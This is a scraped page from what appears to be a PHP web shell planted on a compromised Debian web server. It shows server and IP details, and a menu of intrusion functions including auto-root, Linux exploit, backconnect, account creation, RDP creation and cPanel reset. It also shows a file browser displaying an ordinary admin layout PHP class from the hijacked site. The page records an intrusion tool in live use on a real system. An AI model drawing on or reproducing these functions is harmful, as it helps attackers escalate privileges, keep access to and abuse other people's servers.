Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.147.78.185
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
ifk /
web.back /
v2021 /
protected /
Layouts /
[ HOME SHELL ]
Name
Size
Permission
Action
AdminLayout.php
1.87
KB
-rw-r--r--
AdminLayout.tpl
3.6
KB
-rw-r--r--
LoginLayout.php
954
B
-rw-r--r--
LoginLayout.tpl
3.37
KB
-rw-r--r--
MainLayout.php
5.07
KB
-rw-r--r--
MainLayout.tpl
19.83
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : AdminLayout.php
<?php class AdminLayout extends TTemplateControl { public function onLoad($param) { parent::onLoad($param); if ($this->User->getRole() == 0) { $message = ""; $purgedPapers = $this->performCleaning_Papers(); if ($purgedPapers > 0) $message .= "Usunięto <b>$purgedPapers</b> pustych rekordów książek"; if (strlen($message)>0) $this->messageInfo("<b>Automatyczne czyszczenie bazy danych:</b> ".$message); } } public function moveTo($param) { $param = $param->getCommandParameter(); $commands = explode(';', $param); $request = array(); for($i=1; $i<count($commands); $i++) { list($par_name, $par_value) = explode(',', $commands[$i]); $request[$par_name] = $par_value; }; $this->Response->redirect($this->Service->constructUrl("Admin.".$commands[0], $request)); } public function adminLogout() { $authManager=$this->Application->getModule('auth'); $authManager->logout(); $this->Response->Redirect("/"); } public function messageSuccess($message_body) { $this->successMessage->Text = TPropertyValue::ensureString($message_body); $this->successPanel->Visible= true; } public function messageError($message_body) { $this->errorMessage->Text = TPropertyValue::ensureString($message_body); $this->errorPanel->Visible= true; } public function messageWarning($message_body) { $this->warningMessage->Text = TPropertyValue::ensureString($message_body); $this->warningPanel->Visible= true; } public function messageInfo($message_body) { $this->infoMessage->Text = TPropertyValue::ensureString($message_body); $this->infoPanel->Visible= true; } public function performCleaning_Papers() { $crit = new TActiveRecordCriteria(); $crit->Condition = "LENGTH(title)<2 AND DATE_SUB(CURDATE(), INTERVAL 1 DAY)>=added_date"; $books = KPaper::finder()->findAll($crit); //return count($books); return 0; } } ?>
Close